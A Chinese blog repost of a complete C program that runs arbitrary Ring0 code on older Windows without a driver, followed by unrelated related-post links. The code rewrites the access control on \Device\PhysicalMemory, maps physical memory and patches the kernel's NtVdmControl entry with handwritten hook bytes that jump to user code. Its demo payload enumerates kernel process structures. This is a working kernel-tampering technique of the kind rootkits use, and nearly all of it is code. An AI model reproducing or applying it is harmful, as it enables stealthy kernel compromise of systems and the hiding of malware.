zzzevazzz给出的是好东东
zzzevazzz给出的是好东东,不放上来可惜:
改了调用pfnMemcpy处蓝屏的代码.直接调用memcpy. Thank for your share...
//************************************************************************
// Ring0Demo.c v1.0 by zzzEVAzzz
// 目的:演示无驱动执行Ring0代码。
// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code
//************************************************************************
#include <stdio.h>
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#pragma comment (lib,"ntdll.lib") // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")
//------------------ 数据类型声明开始 --------------------//
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef enum _SECTION_INHERIT {
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
typedef struct _MY_PROCESS_INFO {
ULONG PID;
ULONG KPEB;
ULONG CR3;
CHAR Name[16];
ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;
typedef long NTSTATUS;
//------------------ 数据类型声明结束 --------------------//
//--------------------- 预定义开始 -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES ); (p)->RootDirectory = r;(p)->Attributes = a;(p)->ObjectName = n;(p)->SecurityDescriptor = s;(p)->SecurityQualityOfService = NULL;}
//--------------------- 预定义结束 -----------------------//
//------------------ Native API声明开始 ------------------//
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
NTSYSAPI
NTSTATUS
NTAPI
ZwOpenSection(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSYSAPI
NTSTATUS
NTAPI
ZwMapViewOfSection(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN ULONG CommitSize,
IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
IN OUT PULONG ViewSize,
IN SECTION_INHERIT InheritDisposition,
IN ULONG AllocationType,
IN ULONG Protect
);
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress
);
NTSYSAPI
NTSTATUS
NTAPI
ZwClose(
IN HANDLE Handle
);
NTSYSAPI
NTSTATUS
NTAPI
NtVdmControl(
IN ULONG ControlCode,
IN PVOID ControlData
);
//------------------ Native API声明结束 ------------------//
//------------------ 全局变量定义开始 --------------------//
NTSTATUS
(NTAPI *pfnNtVdmControl)(
IN ULONG ControlCode,
IN PVOID ControlData
);
BOOLEAN
(NTAPI *pfnPsGetVersion)(
PULONG MajorVersion OPTIONAL,
PULONG MinorVersion OPTIONAL,
PULONG BuildNumber OPTIONAL,
PUNICODE_STRING CSDVersion OPTIONAL
);
HANDLE
(NTAPI *pfnPsGetCurrentProcessId)(
);
PVOID
(NTAPI *pfnMemcpy)(
IN VOID UNALIGNED *Destination,
IN CONST VOID UNALIGNED *Source,
IN SIZE_T Length
);
ULONG
(_cdecl *pfnDbgPrint)(
IN PCHAR Format,
...
);
ULONG *pPsInitialSystemProcess;
//------------------ 全局变量定义结束 --------------------//
// 获取指定模块的基址
PVOID GetModuleBase(PCSTR name)
{
NTSTATUS status;
PVOID pBuffer, pModule;
ULONG nRetSize, i, n;
PSYSTEM_MODULE_INFORMATION pmi;
pBuffer = LocalAlloc(LPTR, 0x1000);
if (NULL == pBuffer)
{
printf("LocalAlloc[0] Failed: %d/n", GetLastError());
return NULL;
}
status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, 0x1000, &nRetSize);
if (STATUS_INFO_LENGTH_MISMATCH == status)
{
// 缓冲区太小,重新分配
LocalFree(pBuffer);
pBuffer = LocalAlloc(LPTR, nRetSize);
if (NULL == pBuffer)
{
printf("LocalAlloc[1] Failed: %d/n", GetLastError());
return NULL;
}
status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, nRetSize, &nRetSize);
}
if (!NT_SUCCESS(status))
{
printf("ZwQuerySystemInformation Failed: %d/n", LsaNtStatusToWinError(status));
LocalFree(pBuffer);
return NULL;
}
pmi = (PSYSTEM_MODULE_INFORMATION)((ULONG)pBuffer + 4);
n = *(ULONG*)pBuffer;
pModule = NULL;
// 搜索指定的模块名,获取基址
for (i=0; i<n; i++)
{
if (!_stricmp(pmi->ImageName+pmi->ModuleNameOffset, name))
{
pModule = pmi->Base;
break;
}
pmi++;
}
LocalFree(pBuffer);
return pModule;
}
// 获取/Device/PhysicalMemory的可读写句柄
HANDLE OpenPhysicalMemory()
{
DWORD dwRet;
NTSTATUS status;
UNICODE_STRING name;
OBJECT_ATTRIBUTES oa;
EXPLICIT_ACCESS ea;
PSECURITY_DESCRIPTOR pSD;
PACL pDacl = NULL;
PACL pNewDacl = NULL;
HANDLE hSection = NULL;
HANDLE hSectionRet = NULL;
RtlInitUnicodeString(&name, L"//Device//PhysicalMemory");
InitializeObjectAttributes(&oa, &name, OBJ_KERNEL_HANDLE, NULL, NULL);
// 以可读写Section权限打开PhysicalMemory
status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
if (NT_SUCCESS(status)) goto FreeAndExit; // 打开成功,直接返回
if (status != STATUS_ACCESS_DENIED)
{
// 错误,但非权限不足,打开失败
printf("ZwOpenSection[0] Failed: %d/n", LsaNtStatusToWinError(status));
hSectionRet = NULL;
goto FreeAndExit;
}
// 以可读写ACL权限打开PhysicalMemory
status = ZwOpenSection(&hSection, READ_CONTROL | WRITE_DAC, &oa);
if (!NT_SUCCESS(status))
{
printf("ZwOpenSection[1] Failed: %d/n", LsaNtStatusToWinError(status));
goto FreeAndExit;
}
// 获取PhysicalMemory的DACL
dwRet = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, &pDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetSecurityInfo Failed: %d/n", dwRet);
goto FreeAndExit;
}
// 创建一个ACE,允许当前用户读写PhysicalMemory
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_READ | SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Failed: %d/n", dwRet);
goto FreeAndExit;
}
// 更新PhysicalMemory的DACL
dwRet = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetSecurityInfo Failed: %d/n", dwRet);
goto FreeAndExit;
}
// 再次以可读写权限打开PhysicalMemory
status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
if (!NT_SUCCESS(status))
{
printf("ZwOpenSection[2] Failed: %d/n", LsaNtStatusToWinError(status));
goto FreeAndExit;
}
FreeAndExit:
if (pSD) LocalFree(pSD);
if (pNewDacl) LocalFree(pNewDacl);
if (hSection) ZwClose(hSection);
return hSectionRet;
}
// 将物理内存映射到当前进程的用户空间
PVOID MapPhysicalMemory(HANDLE hSection, // 物理内存的Section句柄
ULONG Offset, // 映射起始偏移量,相对于物理内存的0地址
ULONG CommitSize // 映射范围
)
{
NTSTATUS status;
PVOID BaseAddress = NULL;
LARGE_INTEGER PhysicalAddress = {Offset, 0};
SIZE_T ViewSize = CommitSize;
status = ZwMapViewOfSection(hSection, (HANDLE)-1, &BaseAddress, 0,
CommitSize, &PhysicalAddress, &ViewSize, ViewShare, 0, PAGE_READWRITE);
if (!NT_SUCCESS(status))
{
printf("ZwMapViewOfSection Failed: %d/n", LsaNtStatusToWinError(status));
return NULL;
}
return BaseAddress;
}
// 在Ring0执行的代码。这里演示如何获取每个进程的PID、KPEB、CR3和ImageName
NTSTATUS Ring0Code(ULONG size, // 缓冲区大小
PULONG buffer) // 缓冲区指针,指向调用者分配的缓存
// 参数个数与NtVdmControl一致,以平衡堆栈
{
ULONG BuildNumber;
ULONG ListOffset;
ULONG PIDOffset;
ULONG NameOffset;
PLIST_ENTRY ListHead, ListPtr;
PMY_PROCESS_INFO mypi;
pfnDbgPrint("Run in Ring0!/n"); // 输出调试信息
pfnPsGetVersion(NULL, NULL, &BuildNumber, NULL);
pfnDbgPrint("BuildNumber = %d/n", BuildNumber);
switch (BuildNumber) // 各版本OS的KPEB结构不同
{
case 2195: // Win2000
ListOffset = 0xa0;
PIDOffset = 0x9c;
NameOffset = 0x1fc;
break;
case 2600: // WinXP
ListOffset = 0x88;
PIDOffset = 0x84;
NameOffset = 0x174;
break;
case 3790: // Win2003
ListOffset = 0x88;
PIDOffset = 0x84;
NameOffset = 0x154;
break;
default:
return STATUS_NOT_IMPLEMENTED;
}
if (size<4) return STATUS_BUFFER_TOO_SMALL;
size -= 4;
if (NULL == buffer) return STATUS_INVALID_PARAMETER;
*buffer = 0L; // 缓存的第一个ULONG用于保存进程总数
mypi = (PMY_PROCESS_INFO)(buffer + 1);
// 历遍ActiveProcessLinks
ListHead = ListPtr = (PLIST_ENTRY)(*pPsInitialSystemProcess + ListOffset);
while (ListPtr->Flink != ListHead)
{
if (size < sizeof(MY_PROCESS_INFO)) return STATUS_BUFFER_TOO_SMALL;
mypi->KPEB = (ULONG)ListPtr - ListOffset;
mypi->PID = *(ULONG*)(mypi->KPEB + PIDOffset);
mypi->CR3 = *(ULONG*)(mypi->KPEB + 0x18);
//pfnMemcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16);
memcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16);
(*buffer)++;
mypi++;
size -= sizeof(MY_PROCESS_INFO);
ListPtr = ListPtr->Flink;
}
return STATUS_SUCCESS;
}
// 显示进程信息
void ListProcessInfo(PULONG buffer)
{
ULONG i, n = *buffer;
PMY_PROCESS_INFO mypi = (PMY_PROCESS_INFO)(buffer + 1);
printf(" PID KPEB CR3 Name/n"
" ---- -------- -------- ----/n");
for (i=0; i<n; i++)
{
printf(" %-4d %08x %08x %s/n",
mypi->PID, mypi->KPEB, mypi->CR3, mypi->Name);
mypi++;
}
}
void main()
{
char *Kernel = "ntoskrnl.exe";
PVOID pKernel = NULL;
HMODULE hKernel = NULL;
HANDLE hSection = NULL;
char *mapping = NULL;
PVOID buffer = NULL;
ULONG offset;
NTSTATUS status;
char OrigCode[24], HookCode[24] =
"/xE8/xFF/xFF/xFF/xFF" // call 0xffffffff ;nt!PsGetCurrentProcessId
"/x3D/xEE/xEE/xEE/xEE" // cmp eax, 0xeeeeeeee ;自己的PID
"/x75/x05" // jne $+5
"/xE9/xDD/xDD/xDD/xDD" // jmp 0xdddddddd ;Ring0Code
"/xB8/x01/x00/x00/xC0" // mov eax, 0xc0000001 ;STATUS_UNSUCCESSFUL
"/xC3"; // ret
printf("/n -=< Run Ring0 Code Without Driver Demo >=-/n/n");
// 获取系统核心模块ntoskrnl.exe的基址
pKernel = GetModuleBase(Kernel);
if (NULL == pKernel) return;
if ((ULONG)pKernel < 0x80000000 || (ULONG)pKernel > 0x9FFFFFFF)
{
// 模块基址超出直接内存映射范围
printf("Error: Kernel module base (%08x) is out of range./n", pKernel);
return;
}
// 在用户态加载一份ntoskrnl.exe
hKernel = LoadLibrary(Kernel);
if (NULL == hKernel)
{
printf("LoadLibrary Failed: %d/n", GetLastError());
return;
}
// 获取内核例程/变量在用户态的相对位置
if ((pfnMemcpy = (PVOID)GetProcAddress(hKernel, "memcpy")) &&
(pfnDbgPrint = (PVOID)GetProcAddress(hKernel, "DbgPrint")) &&
(pfnNtVdmControl = (PVOID)GetProcAddress(hKernel, "NtVdmControl")) &&
(pfnPsGetVersion = (PVOID)GetProcAddress(hKernel, "PsGetVersion")) &&
(pfnPsGetCurrentProcessId = (PVOID)GetProcAddress(hKernel, "PsGetCurrentProcessId")) &&
(pPsInitialSystemProcess = (PVOID)GetProcAddress(hKernel, "PsInitialSystemProcess")));
else
{
printf("GetProcAddress Failed: %d/n", GetLastError());
goto FreeAndExit;
}
// 计算内核例程/变量的实际地址
offset = (ULONG)pKernel - (ULONG)hKernel;
(ULONG)pfnMemcpy += offset;
(ULONG)pfnDbgPrint += offset;
(ULONG)pfnNtVdmControl += offset;
(ULONG)pfnPsGetVersion += offset;
(ULONG)pfnPsGetCurrentProcessId += offset;
(ULONG)pPsInitialSystemProcess += offset;
// 设置HookCode
*(ULONG*)(HookCode+1) = (ULONG)pfnPsGetCurrentProcessId - (ULONG)pfnNtVdmControl - 5;
*(ULONG*)(HookCode+6) = GetCurrentProcessId();
*(ULONG*)(HookCode+13) = (ULONG)Ring0Code - (ULONG)pfnNtVdmControl - 17;
// 打开物理内存Section
hSection = OpenPhysicalMemory();
if (NULL == hSection) goto FreeAndExit;
// 映射NtVdmControl入口附近的内存
offset = (ULONG)pfnNtVdmControl & 0x1FFFF000; // 转换到物理内存页地址
mapping = MapPhysicalMemory(hSection, offset, 0x2000);
if (NULL == mapping) goto FreeAndExit;
// 保存NtVdmControl入口代码
offset = (ULONG)pfnNtVdmControl & 0x00000FFF; // 页内偏移
memcpy(OrigCode, mapping+offset, 24);
buffer = LocalAlloc(LPTR, 0x1000);
if (NULL == buffer)
{
printf("LocalAlloc Failed: %d/n", GetLastError());
goto FreeAndExit;
}
memcpy(mapping+offset, HookCode, 24); // 挂钩NtVdmControl
status = NtVdmControl(0x1000, buffer); // 调用NtVdmControl,进入Ring0
memcpy(mapping+offset, OrigCode, 24); // 还原NtVdmControl入口
if (!NT_SUCCESS(status))
{
printf("NtVdmControl Failed: %d/n", LsaNtStatusToWinError(status));
goto FreeAndExit;
}
ListProcessInfo(buffer);
FreeAndExit:
if (buffer != NULL) LocalFree(buffer);
if (mapping != NULL) ZwUnmapViewOfSection(hSection, mapping);
if (hSection != NULL) ZwClose(hSection);
if (hKernel != NULL) FreeLibrary(hKernel);
}
---
zzzevazzz给出的是好东东相关推荐
- 为什么会有jsessionid,这个东东有什么用呢?
2019独角兽企业重金招聘Python工程师标准>>> 为什么会有jsessionid,这个东东有什么用呢? 博客分类: java 为什么会有jsessionid,这个东东有什么用呢 ...
- 网管必看的好东东(一)
自动释放系统资源 在Windows中每运行一个程序,系统资源就会减少.有的程序会消耗大量的系统资源,即使把程序关闭,在内存中还是有一些没用的DLL文件在运行,这样就使得系统的运行速度下降.不过我们可以 ...
- if __name__ == __main__:什么意思_好冷的Python if __name__==__main__是啥东东
在看Python标准库文件或他人写的Python模块时,经常看到py文件最后有这样一段代码: if __name__=='__main__': 'do something' 从代码字面含义理解,如果_ ...
- gitlab 安装gitlabrunner 无法连接tiller_谈一谈GitLab Runner是个什么东东?
概念 我从官网搜了一下,GitLab Runner 是一个开源项目, 它用来运行你定制的任务(jobs)并把结果返回给 GitLab. GitLab Runner 配合GitLab CI(GitLab ...
- 被众人膜拜的欧拉恒等式是个什么东东?
老子说:道生一,一生二,二生三,三生万物.万物的本源既是数,自然世界造化了万物,也造化了人类,聪明的人类参照了大自然造化万物的方法,自已又物化出了一个能够认知.解释和预测自然界的一套逻辑方法.而数学, ...
- ci写微博php,php(CI框架)+ajax实现类似微博的东东
写在前面:好久没有更新博客,这段时间主要在写这个东西了,其实东西也不难,两三天就写好了.也收获了一些东西,这里做一下分享和总结. 需求:是学校新闻中心组织的一个活动,感恩母亲节微言活动,将收集到的祝福 ...
- 【Week9 作业】A - 咕咕东的目录管理器、B - 东东学打牌、C - 签到题,独立思考哈
A - 咕咕东的目录管理器 题意: 咕咕东的雪梨电脑的操作系统在上个月受到宇宙射线的影响,时不时发生故障,他受不了了,想要写一个高效易用零bug的操作系统 -- 这工程量太大了,所以他定了一个小目标, ...
- 不被多数人知道但却超好的东东
1.红霉素软膏,治脸上开放性或者封闭性的痘痘比较管用.含有抗生素,见效快,但不能长期使用 2. 金霉素软膏,是一种眼药,涂在脂肪粒上可以消脂肪粒 3. 白糖,少量白糖加在洗面奶里洗脸,对去黑色痘印 ...
- 学习笔记---Winform的东东忘了好些。。。
很简单但老是忘的东东 代码 privatevoid lbl_min_Click(object sender, EventArgs e) {this.WindowState = FormWindowSt ...
最新文章
- oracle 查询数据横向,Oracle 查询存储过程做横向报表的方法
- mysql mapper foreach_springboot结合MyBatis中使用foreach
- FPGA控制的数码显示电路
- 数据结构源码笔记(C语言):哈希表的相关运算算法
- java并行体系结构
- MyBatis中动态sql的模糊搜索、foreach实现In集合的用法
- PAT_B_1051_Java(15分)
- ios 图像翻转_在iOS 14中使用计算机视觉的图像差异
- python 累积正态分布函数_Python编程基础—Python语句书写规范
- Jstorm+Spring+mybatis整合
- php原生态三级联动_ajax php实现三级联动的方法
- 联想e431笔记本更改硬盘模式bios设置的详细教程
- Visual C++串口通信编程---多线程异步方式
- svg如何平铺 html5,如何在HTML5中使用SVG
- android.mk 编译32位_C/C++初学者常见编译错误及其解决办法
- (转)div+css布局之float与clear的用法
- u盘 计算机管理 没有就绪,U盘无法识别先别着急扔!这五步操作还能挽救一下...
- 如何使用Nginx Ingress实现灰度发布和蓝绿发布?
- 通过phpstudy(小皮面板)搭建DVWA靶场教程
- 搞定 WeakHashMap 的工作原理一篇文章就够了!!!